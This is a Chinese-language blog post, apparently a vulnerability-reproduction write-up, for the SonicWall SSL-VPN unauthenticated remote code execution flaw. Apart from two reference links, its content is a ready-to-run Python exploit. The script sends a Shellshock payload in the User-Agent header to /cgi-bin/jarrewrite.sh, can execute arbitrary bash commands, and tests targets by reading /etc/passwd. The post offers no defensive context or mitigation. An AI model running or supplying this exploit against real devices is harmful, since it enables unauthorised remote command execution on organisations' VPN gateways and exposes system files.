SonicWall SSL-VPN 未授权RCE漏洞 复现

作者: print("") 分类: 漏洞复现 发布时间: 2021-01-25 21:04

https://www.seebug.org/vuldb/ssvid-99110

https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

exp: 

# !/usr/bin/python
import requests
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}
def execute_command(target, command):
    url = target + "/cgi-bin/jarrewrite.sh"
    headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" % (command)}
    r = requests.get(url=url, headers=headers, verify=False,proxies=proxies)
    return r.text


def check_exploitable(target):
    print("(+) Testing %s for pwnability..." % (target))
    output = execute_command(target=target, command="cat /etc/passwd")
    if "root:" in output:
        print(output)
        print("[+]存在漏洞")
        return True
    else:
        print("[!]不存在漏洞")
        return False

if __name__ == "__main__":
    import sys
    url=sys.argv[1]
    check_exploitable(url)

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

您的电子邮箱地址不会被公开。

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CobaltStrike CobaltStrike xss CommonsCollections5 Confluence CVE-2021-26084 CVE-2017-18349 CVE-2021-4034 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 CVE-2022-39197 CVE-2023-28432 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA